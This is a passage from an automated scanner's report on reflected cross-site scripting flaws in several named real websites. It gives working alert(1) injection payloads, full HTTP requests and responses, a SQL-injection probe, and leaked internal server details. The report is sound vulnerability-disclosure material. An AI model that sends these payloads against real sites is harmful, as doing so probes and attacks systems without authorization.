This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27&conf=wac&fromprefetch=113642'-alert(1)-'b9cae18ffb4&p=24&s=143 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:44:23 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:54:23 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb6
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2489


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:44:23 AM
- Source :        .Net SqlClient Data Provider
- Message :        Unclosed quo
...[SNIP]...
onse.write(268409241-22)''.
- message :        undefined
- Number :        105
- Description :        undefined
- description :        undefined
- URL:        cfg=response.write(268409241-22)'&conf=wac&fromprefetch=113642'-alert(1)-'b9cae18ffb4&p=24&s=143
- Remote IP :        50.23.123.106
- Referrer URL :        
- Server IP:        192.168.20.73, SCOUTWEB6
- MachineName:        SCOUTWEB6
- Stack Trace:
at System.Data.SqlClient.SqlConnection.OnE
...[SNIP]...

1.22. http://www.scout.com/staticpages/www/24/wac/a.z [fromprefetch parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The value of the fromprefetch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8c8f8(a)136ed51efa3 was submitted in the fromprefetch parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27&conf=wac&fromprefetch=18c8f8(a)136ed51efa3&p=24&s=143 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:44:26 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 17:54:26 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2471


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:44:26 AM
- Source :        .Net SqlClient Data Provider
- Message :        Unclosed quo
...[SNIP]...
<!--
v. 0.0.0.21898
Server Date: Saturday, October 15, 2011 10:44:26 AM
URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac&fromprefetch=18c8f8(a)136ed51efa3&p=24&s=143
Server IP: 192.168.20.93, SCOUTWEB1
Page Execution Time: 5 ms
-->
...[SNIP]...

1.23. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f1a7'-alert(1)-'a5336cd2117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27&conf=wac&fromprefetch=1&p=24&s=143&5f1a7'-alert(1)-'a5336cd2117=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:50:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 18:00:50 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2480


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:50:50 AM
- Source :        .Net SqlClient Data Provider
- Message :        Unclosed quo
...[SNIP]...
68409241-22)''.
- message :        undefined
- Number :        105
- Description :        undefined
- description :        undefined
- URL:        cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143&5f1a7'-alert(1)-'a5336cd2117=1
- Remote IP :        50.23.123.106
- Referrer URL :        
- Server IP:        192.168.20.64, SODO
- MachineName:        SODO
- Stack Trace:
at System.Data.SqlClient.SqlConnection.OnError(SqlException e
...[SNIP]...

1.24. http://www.scout.com/staticpages/www/24/wac/a.z [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 12d5e(a)a46397c192b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27&conf=wac&fromprefetch=1&p=24&s=143&12d5e(a)a46397c192b=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:50:50 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 18:00:50 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2477


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:50:50 AM
- Source :        .Net SqlClient Data Provider
- Message :        Unclosed quo
...[SNIP]...
<!--
v. 0.0.0.21898
Server Date: Saturday, October 15, 2011 10:50:50 AM
URL: http://www.scout.com:80/Legacy/a.z?cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143&12d5e(a)a46397c192b=1
Server IP: 192.168.20.94, SCOUTWEB2
Page Execution Time: 4 ms
-->
...[SNIP]...

1.25. http://www.sqlservercentral.com/Forums/Topic1189509-391-1.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sqlservercentral.com
Path:   /Forums/Topic1189509-391-1.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7ac3"><script>alert(1)</script>996d28993fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Forums/Topic1189509-391-1.aspx?d7ac3"><script>alert(1)</script>996d28993fe=1 HTTP/1.1
Host: www.sqlservercentral.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.google.com/search?gcx=c&sourceid=chrome&ie=UTF-8&q='%22%3C%2Ftitle%3E%3Cscript+src%22+urchin.js'#q='%22%3C/title%3E%3Cscript+src%22+urchin.js'&hl=en&tbo=1&output=search&source=lnt&tbs=qdr:w&sa=X&ei=VJGYTuXZBLDYiAKFn43CDQ&ved=0CAYQpwUoAw&bav=on.2,or.r_gc.r_pw.,cf.osb&fp=43b88dc4ecfc77e7&biw=1326&bih=890
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 136203
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ssc_IF_ForumsRead391=391%7c10%2f14%2f2011+1%3a45%3a58+PM; expires=Mon, 24-Oct-2011 19:45:58 GMT; path=/
Set-Cookie: ssc_IF_TopicsRead1189509=1189509%7c10%2f14%2f2011+1%3a45%3a58+PM; expires=Mon, 24-Oct-2011 19:45:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Fri, 14 Oct 2011 19:45:58 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="InstantForumHeader"><title>Can I close
...[SNIP]...
<img title="Expand / Collapse" id="b_tblTopicTopicID1189509ForumID391PageIndex1d7ac3"><script>alert(1)</script>996d28993fe1" unselectable="on" src="Skins/Classic/Images/Misc_Collapse.gif" OnClick="td('a_tblTopicTopicID1189509ForumID391PageIndex1d7ac3&quot;>
...[SNIP]...

1.26. http://www1.winbuyer.com/umbraco/ImageGen.ashx [image parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www1.winbuyer.com
Path:   /umbraco/ImageGen.ashx

Issue detail

The value of the image request parameter is copied into the HTML document as plain text between tags. The payload 86a9e<script>alert(1)</script>238333c352c was submitted in the image parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /umbraco/ImageGen.ashx?image=/media/69628/build.png86a9e<script>alert(1)</script>238333c352c&width=60&height=60%22 HTTP/1.1
Host: www1.winbuyer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www1.winbuyer.com/company/about-us
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OCPActivity=GUID=ac2077a2-b85b-4a18-8d31-98ddd3515bd4; OCPSessBrw=GUID=7c684154-61fb-413f-8e86-2ccfecb177f2; OCPSessSrv=GUID=7c684154-61fb-413f-8e86-2ccfecb177f2; __utma=1.1625342161.1318615457.1318615457.1318615457.1; __utmb=1.1.10.1318615457; __utmc=1; __utmz=1.1318615457.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=3j412oejyrnzvj5512chtm55; WinBuyer_Visitor_GuidId=0191e8bc-f0fb-4511-b297-d32e8ed32a3b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 79
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Fri, 14 Oct 2011 18:04:59 GMT

File not found: /media/69628/build.png86a9e<script>alert(1)</script>238333c352c

1.27. http://domains.googlesyndication.com/domainads/search [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://domains.googlesyndication.com
Path:   /domainads/search

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload eb89d<script>alert(1)</script>ab45e8e8d79 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /domainads/search?callback=_google_json_callback&output=js&client=dp-demandmedia10_js&domain_name=adquire.com&q=Quire&channel=009001&qry_lnk=Quire&num=0&ad=a10n3&adext=as1%2Csr1&adrep=3&dt=1319053541365&u_tz=-300&u_his=0&u_h=1200&u_w=1920&frm=0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)eb89d<script>alert(1)</script>ab45e8e8d79
Proxy-Connection: Keep-Alive
Host: domains.googlesyndication.com

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Wed, 19 Oct 2011 19:46:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Disposition: inline
X-Content-Type-Options: nosniff
Server: domainserver
Content-Length: 1046
X-XSS-Protection: 1; mode=block

_google_json_callback(
{
"tm": 0.026109,
"callback": "_google_json_callback",
"output": "xml_no_dtd",
"client": "dp-demandmedia10_js",
"domain_name": "adquire.com",
"q": "Qui
...[SNIP]...
useragent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)eb89d<script>alert(1)</script>ab45e8e8d79,gzip(gfe)",
"adsafe": "medium",
"safe": "high",

"request": {
"client": "dp-demandmedia10_js",
"hl": "",
"domain_name": "adquire.com",
"s": "",
"q": "Quir
...[SNIP]...

1.28. http://t.tellapart.com/tpv [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://t.tellapart.com
Path:   /tpv

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67fa6"-alert(1)-"8da9de954fa was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /tpv HTTP/1.1
Host: t.tellapart.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.51.22 (KHTML, like Gecko) Version/5.1.1 Safari/534.51.22
Content-Length: 1327
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.soap.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybI4Hf0zORQiy8HAq
Referer: http://www.google.com/search?hl=en&q=67fa6"-alert(1)-"8da9de954fa
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

------WebKitFormBoundarybI4Hf0zORQiy8HAq
Content-Disposition: form-data; name="aid"

fg4LmxJU2Xf8
------WebKitFormBoundarybI4Hf0zORQiy8HAq
Content-Disposition: form-data; name="xt"

pv
------W
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Oct 2011 01:38:21 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: TAFE
Set-Cookie: drapt=ABJeb1_iC6xrWJsXpklz7tkjUmKOmxtyb7Z5WErK-D-Tp5NCa2bq9-Qxo55mNn780j0meiCqkHQ8jqV0WniHhtAk-5ku4pJVLjU39kcwKzHphP_v5RKb8g3lNXoQpExJXSA7FyHttrOyKzcTP-SsPcClWlUSEYP38ScuKw9Tae_uGB04UznrXb8GGkvzZk-rqZl-QeavECnfGVnlD_Nfcvpa9S9-5lFkxY2tbB5QfG7L9Pp4C33st62H71PnWdqFUmSPXqn3XYH_B-wavkGoGYIM6hBz3JT6kEwi-zCVivqwoiGC-8jvjiE; expires=Mon, 16-Apr-2012 01:38:21 GMT; Path=/; Domain=.tellapart.com
Set-Cookie: tap=P84ji8VDc10M5It_WyuOG2Z_B3YPAAEMAAAABQsAAQAAAAI5OQoAAwAAATMZ07kvAAsAAQAAAAI3NQoAAwAAATMZ07kvAAsAAQAAAAI3NAoAAwAAATMZ07kvAAsAAQAAAAMxMDgKAAMAAAEzGdO5LwALAAEAAAADMTA1CgADAAABMxnTuS8AAA==; expires=Mon, 16-Apr-2012 01:38:21 GMT; Path=/; Domain=.tellapart.com
Content-Length: 370
Connection: keep-alive

<script type="text/javascript">
top.postMessage('{"slt": 1318988301874, "e": "ABJeb1_KWdZiRgP7Em5rcFAxbCOH59Z4-d_kM42cKVKxaU5IR6ol-gs9f2ABJMvPUP-WYumngPqNC5ipaONpl-JS0nSdE_BjyQ", "u": "ABJeb1_ZiQnYo8fSwvG499-O4tro0q_dlODJWcTqjSGxBBd54W4YCXwhjZlVu6_kPvOE5Bovn_2tpsrozdXEGyCtfGfPUkY2VQ"}', "http://www.google.com/search?hl=en&q=67fa6"-alert(1)-"8da9de954fa");
</script>
...[SNIP]...

1.29. http://www.scout.com/staticpages/www/24/wac/a.z [Referer HTTP header]  previous

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.scout.com
Path:   /staticpages/www/24/wac/a.z

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72c8a'-alert(1)-'e71248a12d5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /staticpages/www/24/wac/a.z?cfg=response.write(268409241-22)%27&conf=wac&fromprefetch=1&p=24&s=143 HTTP/1.1
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.scout.com
Referer: http://www.google.com/search?hl=en&q=72c8a'-alert(1)-'e71248a12d5

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sat, 15 Oct 2011 17:51:02 GMT
Content-Type: text/html; charset=utf-8
Expires: Sat, 15 Oct 2011 18:01:02 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.21898
Vary: Accept-Encoding
Content-Length: 2498


<!--
ERROR in function:    "DB_Template_GET_BySiteAndPageType()"
- Local date/time :    Saturday, October 15, 2011 10:51:02 AM
- Source :        .Net SqlClient Data Provider
- Message :        Unclosed quo
...[SNIP]...

- description :        undefined
- URL:        cfg=response.write(268409241-22)'&conf=wac&fromprefetch=1&p=24&s=143
- Remote IP :        50.23.123.106
- Referrer URL :        http://www.google.com/search?hl=en&q=72c8a'-alert(1)-'e71248a12d5
- Server IP:        192.168.20.95, SCOUTWEB3
- MachineName:        SCOUTWEB3
- Stack Trace:
at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection)
at Syst
...[SNIP]...

Report generated by XSS.CX at Fri Oct 28 15:09:54 CDT 2011.